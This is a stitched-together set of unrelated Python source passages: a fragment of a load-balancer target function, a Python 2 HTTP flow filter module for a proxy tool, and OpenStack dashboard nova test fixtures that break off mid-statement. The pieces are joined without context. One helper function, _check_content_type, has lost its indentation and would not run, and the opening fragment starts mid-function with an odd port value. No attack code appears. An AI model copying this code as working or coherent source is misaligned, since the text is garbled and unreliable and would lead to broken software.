    ip_targets = [{"ipAddress": ip, "ports": "100: bar.com"}
                  for ip in ip_addresses or []]
    # Instance targets first, then IP targets — same order as before.
    return lb.settargets(loadBalancerTargets=instance_targets + ip_targets)
| |
"""
The following operators are understood:
~q Request
~s Response
Headers:
Patterns are matched against "name: value" strings. Field names are
all-lowercase.
~a Asset content-type in response. Asset content types are:
text/javascript
application/x-javascript
application/javascript
text/css
image/*
application/x-shockwave-flash
~h rex Header line in either request or response
~hq rex Header in request
~hs rex Header in response
~b rex Expression in the body of either request or response
~bq rex Expression in the body of request
            ~bs rex     Expression in the body of response
~t rex Shortcut for content-type header.
~d rex Request domain
~m rex Method
~u rex URL
~c CODE Response code.
rex Equivalent to ~u rex
"""
from __future__ import absolute_import
import re, sys
from .contrib import pyparsing as pp
from .protocol.http import decoded
class _Token:
    # Base class for nodes of a parsed filter expression.
    def dump(self, indent=0, fp=sys.stdout):
        # Pretty-print this node (plus its expression, if any) to fp.
        # NOTE: Python 2 print-statement syntax; this module is Python 2 only.
        print >> fp, "\t"*indent, self.__class__.__name__,
        if hasattr(self, "expr"):
            print >> fp, "(%s)"%self.expr,
        print >> fp
class _Action(_Token):
    # A filter operator; subclasses define `code`/`help` and are callable on a flow.
    @classmethod
    def make(klass, s, loc, toks):
        # pyparsing parse action: drop the leading token and construct the
        # node from the remaining ones.
        return klass(*toks[1:])
class FErr(_Action):
    code = "e"
    help = "Match error"
    def __call__(self, f):
        """Match flows that carry an error."""
        return bool(f.error)
class FReq(_Action):
    code = "q"
    help = "Match request with no response"
    def __call__(self, f):
        # True for a flow still awaiting its response; otherwise falls
        # through and returns None (falsy).
        if not f.response:
            return True
class FResp(_Action):
    code = "s"
    help = "Match response"
    def __call__(self, f):
        """Match flows that have a response."""
        return bool(f.response)
class _Rex(_Action):
    """Base class for filters that match a regular expression (`expr`)."""
    def __init__(self, expr):
        self.expr = expr
        try:
            self.re = re.compile(self.expr)
        except re.error:
            # Fix: "raise ValueError, msg" is Python-2-only syntax; the call
            # form works on both 2 and 3. The bare "except:" is also narrowed
            # to the regex-compilation failure it is meant to translate.
            raise ValueError("Cannot compile expression.")
def _check_content_type(expr, o):
val = o.headers["content-type"]
if val and re.search(expr, val[0]):
return True
return False
class FAsset(_Action):
    code = "a"
    help = "Match asset in response: CSS, Javascript, Flash, images."
    # Content-type regexes considered "assets".
    ASSET_TYPES = [
        "text/javascript",
        "application/x-javascript",
        "application/javascript",
        "text/css",
        "image/.*",
        "application/x-shockwave-flash"
    ]

    def __call__(self, f):
        if not f.response:
            return False
        return any(
            _check_content_type(expr, f.response)
            for expr in self.ASSET_TYPES
        )
class FContentType(_Rex):
    code = "t"
    help = "Content-type header"

    def __call__(self, f):
        # Request side first; only consult the response if it exists and
        # the request did not already match.
        matched = _check_content_type(self.expr, f.request)
        if not matched and f.response:
            matched = _check_content_type(self.expr, f.response)
        return matched
class FRequestContentType(_Rex):
    code = "tq"
    help = "Request Content-Type header"

    def __call__(self, f):
        # Only the request side is consulted; result is True/False.
        result = _check_content_type(self.expr, f.request)
        return result
class FResponseContentType(_Rex):
    code = "ts"
    help = "Response Content-Type header"

    def __call__(self, f):
        # No response yet -> cannot match.
        if not f.response:
            return False
        return _check_content_type(self.expr, f.response)
class FHead(_Rex):
    code = "h"
    help = "Header"

    def __call__(self, f):
        # Check request headers, then response headers (when present),
        # in that order.
        header_sets = [f.request.headers]
        if f.response:
            header_sets.append(f.response.headers)
        for headers in header_sets:
            if headers.match_re(self.expr):
                return True
        return False
class FHeadRequest(_Rex):
    code = "hq"
    help = "Request header"

    def __call__(self, f):
        # True on a header match, otherwise None (falsy), matching the
        # original's implicit return.
        return True if f.request.headers.match_re(self.expr) else None
class FHeadResponse(_Rex):
    code = "hs"
    help = "Response header"

    def __call__(self, f):
        if not f.response:
            return None
        if f.response.headers.match_re(self.expr):
            return True
class FBod(_Rex):
    code = "b"
    help = "Body"

    def __call__(self, f):
        # Search the (decoded) body of each half of the flow that has
        # content: request first, then response.
        for message in (f.request, f.response):
            if message and message.content:
                with decoded(message):
                    if re.search(self.expr, message.content):
                        return True
        return False
class FBodRequest(_Rex):
    code = "bq"
    help = "Request body"

    def __call__(self, f):
        request = f.request
        if not (request and request.content):
            return None
        # Body may be content-encoded; search the decoded form.
        with decoded(request):
            if re.search(self.expr, request.content):
                return True
class FBodResponse(_Rex):
    code = "bs"
    help = "Response body"

    def __call__(self, f):
        response = f.response
        if not (response and response.content):
            return None
        # Body may be content-encoded; search the decoded form.
        with decoded(response):
            if re.search(self.expr, response.content):
                return True
class FMethod(_Rex):
    code = "m"
    help = "Method"

    def __call__(self, f):
        # Case-insensitive match against the HTTP method.
        found = re.search(self.expr, f.request.method, re.IGNORECASE)
        return found is not None
class FDomain(_Rex):
    code = "d"
    help = "Domain"

    def __call__(self, f):
        # Case-insensitive match against the request host.
        found = re.search(self.expr, f.request.host, re.IGNORECASE)
        return found is not None
class FUrl(_Rex):
    code = "u"
    help = "URL"

    # FUrl is special: it may appear "naked" (no ~u prefix), in which
    # case there is no leading operator token to strip.
    @classmethod
    def make(klass, s, loc, toks):
        args = toks[1:] if len(toks) > 1 else toks
        return klass(*args)

    def __call__(self, f):
        # Returns the match object (truthy) rather than a bool.
        return re.search(self.expr, f.request.url)
class _Int(_Action):
    """Base for filters whose single argument is an integer literal."""

    def __init__(self, num):
        # num arrives as a parsed string token.
        self.num = int(num)
class FCode(_Int):
    code = "c"
    help = "HTTP response code"

    def __call__(self, f):
        # True on an exact status-code match; None (falsy) otherwise,
        # preserving the original's implicit-return contract.
        if not f.response:
            return None
        if f.response.code == self.num:
            return True
class FAnd(_Token):
    """Logical AND over a list of sub-filters."""

    def __init__(self, lst):
        self.lst = lst

    def dump(self, indent=0, fp=sys.stdout):
        # Print this node, then each child one level deeper.
        print >> fp, "\t"*indent, self.__class__.__name__
        for i in self.lst:
            i.dump(indent+1, fp)

    def __call__(self, f):
        # Matches only when every sub-filter matches.
        return all(i(f) for i in self.lst)
class FOr(_Token):
    """Logical OR over a list of sub-filters."""

    def __init__(self, lst):
        self.lst = lst

    def dump(self, indent=0, fp=sys.stdout):
        # Print this node, then each child one level deeper.
        print >> fp, "\t"*indent, self.__class__.__name__
        for i in self.lst:
            i.dump(indent+1, fp)

    def __call__(self, f):
        # Matches when any sub-filter matches.
        return any(i(f) for i in self.lst)
class FNot(_Token):
    """Logical negation of a single sub-filter."""

    def __init__(self, itm):
        # itm arrives as a one-element parse-result sequence.
        self.itm = itm[0]

    def dump(self, indent=0, fp=sys.stdout):
        print >> fp, "\t"*indent, self.__class__.__name__
        self.itm.dump(indent + 1, fp)

    def __call__(self, f):
        return not self.itm(f)
# Operator registries consumed by _make() when assembling the grammar.

# Operators that take no argument:
filt_unary = [
    FReq,
    FResp,
    FAsset,
    FErr
]
# Operators that take a regex argument.  Multi-character codes must be
# listed before their single-character prefixes (e.g. "hq" before "h")
# so the longest operator wins during parsing:
filt_rex = [
    FHeadRequest,
    FHeadResponse,
    FHead,
    FBodRequest,
    FBodResponse,
    FBod,
    FMethod,
    FDomain,
    FUrl,
    FRequestContentType,
    FResponseContentType,
    FContentType,
]
# Operators that take an integer argument:
filt_int = [
    FCode
]
def _make():
    """Assemble and return the pyparsing grammar for filter expressions."""
    # Order is important - multi-char expressions need to come before narrow
    # ones.
    parts = []
    for klass in filt_unary:
        f = pp.Literal("~%s"%klass.code)
        f.setParseAction(klass.make)
        parts.append(f)

    # A regex argument is either a bare run of printable characters
    # (excluding grouping/quote characters) or a quoted string.
    simplerex = "".join(c for c in pp.printables if c not in  "()~'\"")
    rex = pp.Word(simplerex) |\
          pp.QuotedString("\"", escChar='\\') |\
          pp.QuotedString("'", escChar='\\')
    for klass in filt_rex:
        f = pp.Literal("~%s"%klass.code) + rex.copy()
        f.setParseAction(klass.make)
        parts.append(f)

    for klass in filt_int:
        f = pp.Literal("~%s"%klass.code) + pp.Word(pp.nums)
        f.setParseAction(klass.make)
        parts.append(f)

    # A naked rex is a URL rex:
    f = rex.copy()
    f.setParseAction(FUrl.make)
    parts.append(f)

    atom = pp.MatchFirst(parts)
    # Boolean operators with conventional precedence: ! binds tightest,
    # then &, then |.
    expr = pp.operatorPrecedence(
        atom,
        [
            (pp.Literal("!").suppress(), 1, pp.opAssoc.RIGHT, lambda x: FNot(*x)),
            (pp.Literal("&").suppress(), 2, pp.opAssoc.LEFT, lambda x: FAnd(*x)),
            (pp.Literal("|").suppress(), 2, pp.opAssoc.LEFT, lambda x: FOr(*x)),
        ]
    )
    # Adjacent expressions with no explicit operator are implicitly ANDed.
    expr = pp.OneOrMore(expr)
    return expr.setParseAction(lambda x: FAnd(x) if len(x) != 1 else x)
bnf = _make()
def parse(s):
    """Parse filter string *s*; return the filter object, or None on error.

    ValueError is raised by _Rex for an uncompilable regex argument and is
    treated the same as a grammar error.
    """
    try:
        parsed = bnf.parseString(s, parseAll=True)[0]
    except (pp.ParseException, ValueError):
        return None
    parsed.pattern = s
    return parsed
| |
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import json
import uuid
from novaclient.v2 import aggregates
from novaclient.v2 import availability_zones
from novaclient.v2 import certs
from novaclient.v2 import flavor_access
from novaclient.v2 import flavors
from novaclient.v2 import floating_ips
from novaclient.v2 import hosts
from novaclient.v2 import hypervisors
from novaclient.v2 import keypairs
from novaclient.v2 import quotas
from novaclient.v2 import security_group_rules as rules
from novaclient.v2 import security_groups as sec_groups
from novaclient.v2 import server_groups
from novaclient.v2 import servers
from novaclient.v2 import services
from novaclient.v2 import usage
from novaclient.v2 import volumes
from openstack_dashboard.api import base
from openstack_dashboard.api import nova
from openstack_dashboard.usage import quotas as usage_quotas
from openstack_dashboard.test.test_data import utils
class FlavorExtraSpecs(dict):
    """Test double for flavor extra-specs: a dict whose keys are also
    exposed as instance attributes, mimicking novaclient resource objects."""

    def __init__(self, info):
        super(FlavorExtraSpecs, self).__init__()
        # Expose keys as attributes and as dict entries; keep the raw
        # payload last so self._info always holds the original mapping.
        self.__dict__.update(info)
        self.update(info)
        self._info = info

    def __repr__(self):
        return "<FlavorExtraSpecs %s>" % self._info
SERVER_DATA = """
{
"server": {
"OS-EXT-SRV-ATTR:instance_name": "instance-00000005",
"OS-EXT-SRV-ATTR:host": "instance-host",
"OS-EXT-STS:task_state": null,
"addresses": {
"private": [
{
"version": 4,
"addr": "10.0.0.1"
}
]
},
"links": [
{
"href": "%(host)s/v1.1/%(tenant_id)s/servers/%(server_id)s",
"rel": "self"
},
{
"href": "%(host)s/%(tenant_id)s/servers/%(server_id)s",
"rel": "bookmark"
}
],
"image": {
"id": "%(image_id)s",
"links": [
{
"href": "%(host)s/%(tenant_id)s/images/%(image_id)s",
"rel": "bookmark"
}
]
},
"OS-EXT-STS:vm_state": "active",
"flavor": {
"id": "%(flavor_id)s",
"links": [
{
"href": "%(host)s/%(tenant_id)s/flavors/%(flavor_id)s",
"rel": "bookmark"
}
]
},
"id": "%(server_id)s",
"user_id": "%(user_id)s",
"OS-DCF:diskConfig": "MANUAL",
"accessIPv4": "",
"accessIPv6": "",
"progress": null,
"OS-EXT-STS:power_state": 1,
"config_drive": "",
"status": "%(status)s",
"updated": "2012-02-28T19:51:27Z",
"hostId": "c461ea283faa0ab5d777073c93b126c68139e4e45934d4fc37e403c2",
"key_name": "%(key_name)s",
"name": "%(name)s",
"created": "2012-02-28T19:51:17Z",
"tenant_id": "%(tenant_id)s",
"metadata": {"someMetaLabel": "someMetaData",
"some<b>html</b>label": "<!--",
"empty": ""}
}
}
"""
USAGE_DATA = """
{
"total_memory_mb_usage": 64246.89777777778,
"total_vcpus_usage": 125.48222222222223,
"total_hours": 125.48222222222223,
"total_local_gb_usage": 0,
"tenant_id": "%(tenant_id)s",
"stop": "2012-01-31T23:59:59.000000",
"start": "2012-01-01T00:00:00.000000",
"server_usages": [
{
"memory_mb": %(flavor_ram)s,
"uptime": 442321,
"started_at": "2012-01-26 20:38:21",
"ended_at": null,
"name": "%(instance_name)s",
"tenant_id": "%(tenant_id)s",
"state": "active",
"hours": 122.87361111111112,
"vcpus": %(flavor_vcpus)s,
"flavor": "%(flavor_name)s",
"local_gb": %(flavor_disk)s
},
{
"memory_mb": %(flavor_ram)s,
"uptime": 9367,
"started_at": "2012-01-31 20:54:15",
"ended_at": null,
"name": "%(instance_name)s",
"tenant_id": "%(tenant_id)s",
"state": "active",
"hours": 2.608611111111111,
"vcpus": %(flavor_vcpus)s,
"flavor": "%(flavor_name)s",
"local_gb": %(flavor_disk)s
}
]
}
"""
def data(TEST):
    """Populate *TEST* with nova/compute fixture data.

    Fills the TestDataContainer attributes (servers, flavors, volumes,
    quotas, floating IPs, hypervisors, services, aggregates, hosts,
    server groups, ...) consumed by the dashboard unit tests.

    Fix over the previous revision: the stray ``global current_int_id``
    statement inside get_id() was dead code (the counter actually lives
    on the function attribute ``get_id.current_int_id``) and has been
    removed.
    """
    TEST.servers = utils.TestDataContainer()
    TEST.flavors = utils.TestDataContainer()
    TEST.flavor_access = utils.TestDataContainer()
    TEST.keypairs = utils.TestDataContainer()
    TEST.security_groups = utils.TestDataContainer()
    TEST.security_groups_uuid = utils.TestDataContainer()
    TEST.security_group_rules = utils.TestDataContainer()
    TEST.security_group_rules_uuid = utils.TestDataContainer()
    TEST.volumes = utils.TestDataContainer()
    TEST.quotas = utils.TestDataContainer()
    TEST.quota_usages = utils.TestDataContainer()
    TEST.disabled_quotas = utils.TestDataContainer()
    TEST.floating_ips = utils.TestDataContainer()
    TEST.floating_ips_uuid = utils.TestDataContainer()
    TEST.usages = utils.TestDataContainer()
    TEST.certs = utils.TestDataContainer()
    TEST.availability_zones = utils.TestDataContainer()
    TEST.hypervisors = utils.TestDataContainer()
    TEST.services = utils.TestDataContainer()
    TEST.aggregates = utils.TestDataContainer()
    TEST.hosts = utils.TestDataContainer()
    TEST.server_groups = utils.TestDataContainer()

    # Data return by novaclient.
    # It is used if API layer does data conversion.
    TEST.api_floating_ips = utils.TestDataContainer()
    TEST.api_floating_ips_uuid = utils.TestDataContainer()

    # Volumes
    volume = volumes.Volume(
        volumes.VolumeManager(None),
        {"id": "41023e92-8008-4c8b-8059-7f2293ff3775",
         "name": 'test_volume',
         "status": 'available',
         "size": 40,
         "display_name": 'Volume name',
         "created_at": '2012-04-01 10:30:00',
         "volume_type": None,
         "attachments": []})
    nameless_volume = volumes.Volume(
        volumes.VolumeManager(None),
        {"id": "3b189ac8-9166-ac7f-90c9-16c8bf9e01ac",
         "name": '',
         "status": 'in-use',
         "size": 10,
         "display_name": '',
         "display_description": '',
         "device": "/dev/hda",
         "created_at": '2010-11-21 18:34:25',
         "volume_type": 'vol_type_1',
         "attachments": [{"id": "1", "server_id": '1',
                          "device": "/dev/hda"}]})
    attached_volume = volumes.Volume(
        volumes.VolumeManager(None),
        {"id": "8cba67c1-2741-6c79-5ab6-9c2bf8c96ab0",
         "name": 'my_volume',
         "status": 'in-use',
         "size": 30,
         "display_name": 'My Volume',
         "display_description": '',
         "device": "/dev/hdk",
         "created_at": '2011-05-01 11:54:33',
         "volume_type": 'vol_type_2',
         "attachments": [{"id": "2", "server_id": '1',
                          "device": "/dev/hdk"}]})
    non_bootable_volume = volumes.Volume(
        volumes.VolumeManager(None),
        {"id": "41023e92-8008-4c8b-8059-7f2293ff3771",
         "name": 'non_bootable_volume',
         "status": 'available',
         "size": 40,
         "display_name": 'Non Bootable Volume',
         "created_at": '2012-04-01 10:30:00',
         "volume_type": None,
         "attachments": []})

    volume.bootable = 'true'
    nameless_volume.bootable = 'true'
    attached_volume.bootable = 'true'
    non_bootable_volume.bootable = 'false'

    TEST.volumes.add(volume)
    TEST.volumes.add(nameless_volume)
    TEST.volumes.add(attached_volume)
    TEST.volumes.add(non_bootable_volume)

    # Flavors
    flavor_1 = flavors.Flavor(flavors.FlavorManager(None),
                              {'id': "aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa",
                               'name': 'm1.tiny',
                               'vcpus': 1,
                               'disk': 0,
                               'ram': 512,
                               'swap': 0,
                               'rxtx_factor': 1,
                               'extra_specs': {},
                               'os-flavor-access:is_public': True,
                               'OS-FLV-EXT-DATA:ephemeral': 0})
    flavor_2 = flavors.Flavor(flavors.FlavorManager(None),
                              {'id': "bbbbbbbb-bbbb-bbbb-bbbb-bbbbbbbbbbbb",
                               'name': 'm1.massive',
                               'vcpus': 1000,
                               'disk': 1024,
                               'ram': 10000,
                               'swap': 0,
                               'rxtx_factor': 1,
                               'extra_specs': {'Trusted': True, 'foo': 'bar'},
                               'os-flavor-access:is_public': True,
                               'OS-FLV-EXT-DATA:ephemeral': 2048})
    flavor_3 = flavors.Flavor(flavors.FlavorManager(None),
                              {'id': "dddddddd-dddd-dddd-dddd-dddddddddddd",
                               'name': 'm1.secret',
                               'vcpus': 1000,
                               'disk': 1024,
                               'ram': 10000,
                               'swap': 0,
                               'rxtx_factor': 1,
                               'extra_specs': {},
                               'os-flavor-access:is_public': False,
                               'OS-FLV-EXT-DATA:ephemeral': 2048})
    flavor_4 = flavors.Flavor(flavors.FlavorManager(None),
                              {'id': "eeeeeeee-eeee-eeee-eeee-eeeeeeeeeeee",
                               'name': 'm1.metadata',
                               'vcpus': 1000,
                               'disk': 1024,
                               'ram': 10000,
                               'swap': 0,
                               'rxtx_factor': 1,
                               'extra_specs': FlavorExtraSpecs(
                                   {'key': 'key_mock',
                                    'value': 'value_mock'}),
                               'os-flavor-access:is_public': False,
                               'OS-FLV-EXT-DATA:ephemeral': 2048})
    TEST.flavors.add(flavor_1, flavor_2, flavor_3, flavor_4)

    # Flavor access (flavor_3 is private and shared with two tenants)
    flavor_access_manager = flavor_access.FlavorAccessManager(None)
    flavor_access_1 = flavor_access.FlavorAccess(
        flavor_access_manager,
        {"tenant_id": "1",
         "flavor_id": "dddddddd-dddd-dddd-dddd-dddddddddddd"})
    flavor_access_2 = flavor_access.FlavorAccess(
        flavor_access_manager,
        {"tenant_id": "2",
         "flavor_id": "dddddddd-dddd-dddd-dddd-dddddddddddd"})
    TEST.flavor_access.add(flavor_access_1, flavor_access_2)

    # Key pairs
    keypair = keypairs.Keypair(keypairs.KeypairManager(None),
                               dict(name='keyName'))
    TEST.keypairs.add(keypair)

    # Security Groups and Rules
    def generate_security_groups(is_uuid=False):

        def get_id(is_uuid):
            # UUID mode returns fresh UUID strings; integer mode uses a
            # monotonically increasing counter kept on the function itself.
            if is_uuid:
                return str(uuid.uuid4())
            else:
                get_id.current_int_id += 1
                return get_id.current_int_id

        get_id.current_int_id = 0

        sg_manager = sec_groups.SecurityGroupManager(None)
        rule_manager = rules.SecurityGroupRuleManager(None)

        sec_group_1 = sec_groups.SecurityGroup(sg_manager,
                                               {"rules": [],
                                                "tenant_id": TEST.tenant.id,
                                                "id": get_id(is_uuid),
                                                "name": u"default",
                                                "description": u"default"})
        sec_group_2 = sec_groups.SecurityGroup(sg_manager,
                                               {"rules": [],
                                                "tenant_id": TEST.tenant.id,
                                                "id": get_id(is_uuid),
                                                "name": u"other_group",
                                                "description": u"NotDefault."})
        sec_group_3 = sec_groups.SecurityGroup(sg_manager,
                                               {"rules": [],
                                                "tenant_id": TEST.tenant.id,
                                                "id": get_id(is_uuid),
                                                "name": u"another_group",
                                                "description": u"NotDefault."})

        rule = {'id': get_id(is_uuid),
                'group': {},
                'ip_protocol': u"tcp",
                'from_port': u"80",
                'to_port': u"80",
                'parent_group_id': sec_group_1.id,
                'ip_range': {'cidr': u"0.0.0.0/32"}}

        icmp_rule = {'id': get_id(is_uuid),
                     'group': {},
                     'ip_protocol': u"icmp",
                     'from_port': u"9",
                     'to_port': u"5",
                     'parent_group_id': sec_group_1.id,
                     'ip_range': {'cidr': u"0.0.0.0/32"}}

        group_rule = {'id': 3,
                      'group': {},
                      'ip_protocol': u"tcp",
                      'from_port': u"80",
                      'to_port': u"80",
                      'parent_group_id': sec_group_1.id,
                      'source_group_id': sec_group_1.id}

        rule_obj = rules.SecurityGroupRule(rule_manager, rule)
        rule_obj2 = rules.SecurityGroupRule(rule_manager, icmp_rule)
        rule_obj3 = rules.SecurityGroupRule(rule_manager, group_rule)

        sec_group_1.rules = [rule_obj]
        sec_group_2.rules = [rule_obj]

        return {"rules": [rule_obj, rule_obj2, rule_obj3],
                "groups": [sec_group_1, sec_group_2, sec_group_3]}

    sg_data = generate_security_groups()
    TEST.security_group_rules.add(*sg_data["rules"])
    TEST.security_groups.add(*sg_data["groups"])

    sg_uuid_data = generate_security_groups(is_uuid=True)
    TEST.security_group_rules_uuid.add(*sg_uuid_data["rules"])
    TEST.security_groups_uuid.add(*sg_uuid_data["groups"])

    # Quota Sets
    quota_data = dict(metadata_items='1',
                      injected_file_content_bytes='1',
                      ram=10000,
                      floating_ips='1',
                      fixed_ips='10',
                      instances='10',
                      injected_files='1',
                      cores='10',
                      security_groups='10',
                      security_group_rules='20')
    quota = quotas.QuotaSet(quotas.QuotaSetManager(None), quota_data)
    TEST.quotas.nova = base.QuotaSet(quota)
    TEST.quotas.add(base.QuotaSet(quota))

    # nova quotas disabled when neutron is enabled
    disabled_quotas_nova = ['floating_ips', 'fixed_ips',
                            'security_groups', 'security_group_rules']
    TEST.disabled_quotas.add(disabled_quotas_nova)

    # Quota Usages
    quota_usage_data = {'gigabytes': {'used': 0,
                                      'quota': 1000},
                        'instances': {'used': 0,
                                      'quota': 10},
                        'ram': {'used': 0,
                                'quota': 10000},
                        'cores': {'used': 0,
                                  'quota': 20},
                        'floating_ips': {'used': 0,
                                         'quota': 10},
                        'security_groups': {'used': 0,
                                            'quota': 10},
                        'volumes': {'used': 0,
                                    'quota': 10}}
    quota_usage = usage_quotas.QuotaUsage()
    for k, v in quota_usage_data.items():
        quota_usage.add_quota(base.Quota(k, v['quota']))
        quota_usage.tally(k, v['used'])

    TEST.quota_usages.add(quota_usage)

    # Limits
    limits = {"absolute": {"maxImageMeta": 128,
                           "maxPersonality": 5,
                           "maxPersonalitySize": 10240,
                           "maxSecurityGroupRules": 20,
                           "maxSecurityGroups": 10,
                           "maxServerMeta": 128,
                           "maxTotalCores": 20,
                           "maxTotalFloatingIps": 10,
                           "maxTotalInstances": 10,
                           "maxTotalKeypairs": 100,
                           "maxTotalRAMSize": 10000,
                           "totalCoresUsed": 0,
                           "totalInstancesUsed": 0,
                           "totalKeyPairsUsed": 0,
                           "totalRAMUsed": 0,
                           "totalSecurityGroupsUsed": 0}}
    TEST.limits = limits

    # Servers
    tenant3 = TEST.tenants.list()[2]

    vals = {"host": "http://nova.example.com:8774",
            "name": "server_1",
            "status": "ACTIVE",
            "tenant_id": TEST.tenants.first().id,
            "user_id": TEST.user.id,
            "server_id": "1",
            "flavor_id": flavor_1.id,
            "image_id": TEST.images.first().id,
            "key_name": keypair.name}
    server_1 = servers.Server(servers.ServerManager(None),
                              json.loads(SERVER_DATA % vals)['server'])
    vals.update({"name": "server_2",
                 "status": "BUILD",
                 "server_id": "2"})
    server_2 = servers.Server(servers.ServerManager(None),
                              json.loads(SERVER_DATA % vals)['server'])
    vals.update({"name": u'\u4e91\u89c4\u5219',
                 "status": "ACTIVE",
                 "tenant_id": tenant3.id,
                 "server_id": "3"})
    server_3 = servers.Server(servers.ServerManager(None),
                              json.loads(SERVER_DATA % vals)['server'])
    vals.update({"name": "server_4",
                 "status": "PAUSED",
                 "server_id": "4"})
    server_4 = servers.Server(servers.ServerManager(None),
                              json.loads(SERVER_DATA % vals)['server'])
    TEST.servers.add(server_1, server_2, server_3, server_4)

    # VNC Console Data
    console = {u'console': {u'url': u'http://example.com:6080/vnc_auto.html',
                            u'type': u'novnc'}}
    TEST.servers.vnc_console_data = console
    # SPICE Console Data
    console = {u'console': {u'url': u'http://example.com:6080/spice_auto.html',
                            u'type': u'spice'}}
    TEST.servers.spice_console_data = console
    # RDP Console Data
    console = {u'console': {u'url': u'http://example.com:6080/rdp_auto.html',
                            u'type': u'rdp'}}
    TEST.servers.rdp_console_data = console

    # Floating IPs
    def generate_fip(conf):
        return floating_ips.FloatingIP(floating_ips.FloatingIPManager(None),
                                       conf)

    fip_1 = {'id': 1,
             'fixed_ip': '10.0.0.4',
             'instance_id': server_1.id,
             'ip': '58.58.58.58',
             'pool': 'pool1'}
    fip_2 = {'id': 2,
             'fixed_ip': None,
             'instance_id': None,
             'ip': '58.58.58.58',
             'pool': 'pool2'}
    # this floating ip is for lbaas tests
    fip_3 = {'id': 3,
             'fixed_ip': '10.0.0.5',
             # the underlying class maps the instance id to port id
             'instance_id': '063cf7f3-ded1-4297-bc4c-31eae876cc91',
             'ip': '58.58.58.58',
             'pool': 'pool2'}
    TEST.api_floating_ips.add(generate_fip(fip_1), generate_fip(fip_2),
                              generate_fip(fip_3))

    TEST.floating_ips.add(nova.FloatingIp(generate_fip(fip_1)),
                          nova.FloatingIp(generate_fip(fip_2)),
                          nova.FloatingIp(generate_fip(fip_3)))

    # Floating IP with UUID id (for Floating IP with Neutron Proxy)
    fip_3 = {'id': str(uuid.uuid4()),
             'fixed_ip': '10.0.0.4',
             'instance_id': server_1.id,
             'ip': '58.58.58.58',
             'pool': 'pool1'}
    fip_4 = {'id': str(uuid.uuid4()),
             'fixed_ip': None,
             'instance_id': None,
             'ip': '58.58.58.58',
             'pool': 'pool2'}
    TEST.api_floating_ips_uuid.add(generate_fip(fip_3), generate_fip(fip_4))

    TEST.floating_ips_uuid.add(nova.FloatingIp(generate_fip(fip_3)),
                               nova.FloatingIp(generate_fip(fip_4)))

    # Usage
    usage_vals = {"tenant_id": TEST.tenant.id,
                  "instance_name": server_1.name,
                  "flavor_name": flavor_1.name,
                  "flavor_vcpus": flavor_1.vcpus,
                  "flavor_disk": flavor_1.disk,
                  "flavor_ram": flavor_1.ram}
    usage_obj = usage.Usage(usage.UsageManager(None),
                            json.loads(USAGE_DATA % usage_vals))
    TEST.usages.add(usage_obj)

    usage_2_vals = {"tenant_id": tenant3.id,
                    "instance_name": server_3.name,
                    "flavor_name": flavor_1.name,
                    "flavor_vcpus": flavor_1.vcpus,
                    "flavor_disk": flavor_1.disk,
                    "flavor_ram": flavor_1.ram}
    usage_obj_2 = usage.Usage(usage.UsageManager(None),
                              json.loads(USAGE_DATA % usage_2_vals))
    TEST.usages.add(usage_obj_2)

    # Certificates
    cert_data = {'private_key': 'private',
                 'data': 'certificate_data'}
    certificate = certs.Certificate(certs.CertificateManager(None), cert_data)
    TEST.certs.add(certificate)

    # Availability Zones
    TEST.availability_zones.add(availability_zones.AvailabilityZone(
        availability_zones.AvailabilityZoneManager(None),
        {
            'zoneName': 'nova',
            'zoneState': {'available': True},
            'hosts': {
                "host001": {
                    "nova-network": {
                        "active": True,
                        "available": True,
                    },
                },
            },
        },
    ))

    # hypervisors
    hypervisor_1 = hypervisors.Hypervisor(
        hypervisors.HypervisorManager(None),
        {
            "service": {"host": "devstack001", "id": 3},
            "vcpus_used": 1,
            "hypervisor_type": "QEMU",
            "local_gb_used": 20,
            "hypervisor_hostname": "devstack001",
            "memory_mb_used": 1500,
            "memory_mb": 2000,
            "current_workload": 0,
            "vcpus": 1,
            "cpu_info": '{"vendor": "Intel", "model": "core2duo",'
                        '"arch": "x86_64", "features": ["lahf_lm"'
                        ', "rdtscp"], "topology": {"cores": 1, "t'
                        'hreads": 1, "sockets": 1}}',
            "running_vms": 1,
            "free_disk_gb": 9,
            "hypervisor_version": 1002000,
            "disk_available_least": 6,
            "local_gb": 29,
            "free_ram_mb": 500,
            "id": 1,
            "servers": [{"name": "test_name", "uuid": "test_uuid"}]
        },
    )

    hypervisor_2 = hypervisors.Hypervisor(
        hypervisors.HypervisorManager(None),
        {
            "service": {"host": "devstack002", "id": 4},
            "vcpus_used": 1,
            "hypervisor_type": "QEMU",
            "local_gb_used": 20,
            "hypervisor_hostname": "devstack001",
            "memory_mb_used": 1500,
            "memory_mb": 2000,
            "current_workload": 0,
            "vcpus": 1,
            "cpu_info": '{"vendor": "Intel", "model": "core2duo",'
                        '"arch": "x86_64", "features": ["lahf_lm"'
                        ', "rdtscp"], "topology": {"cores": 1, "t'
                        'hreads": 1, "sockets": 1}}',
            "running_vms": 1,
            "free_disk_gb": 9,
            "hypervisor_version": 1002000,
            "disk_available_least": 6,
            "local_gb": 29,
            "free_ram_mb": 500,
            "id": 2,
            "servers": [{"name": "test_name_2", "uuid": "test_uuid_2"}]
        },
    )

    # Note: no "servers" key -- exercises the hypervisor-without-servers path.
    hypervisor_3 = hypervisors.Hypervisor(
        hypervisors.HypervisorManager(None),
        {
            "service": {"host": "instance-host", "id": 5},
            "vcpus_used": 1,
            "hypervisor_type": "QEMU",
            "local_gb_used": 20,
            "hypervisor_hostname": "devstack003",
            "memory_mb_used": 1500,
            "memory_mb": 2000,
            "current_workload": 0,
            "vcpus": 1,
            "cpu_info": '{"vendor": "Intel", "model": "core2duo",'
                        '"arch": "x86_64", "features": ["lahf_lm"'
                        ', "rdtscp"], "topology": {"cores": 1, "t'
                        'hreads": 1, "sockets": 1}}',
            "running_vms": 1,
            "free_disk_gb": 9,
            "hypervisor_version": 1002000,
            "disk_available_least": 6,
            "local_gb": 29,
            "free_ram_mb": 500,
            "id": 3,
        },
    )
    TEST.hypervisors.add(hypervisor_1)
    TEST.hypervisors.add(hypervisor_2)
    TEST.hypervisors.add(hypervisor_3)

    TEST.hypervisors.stats = {
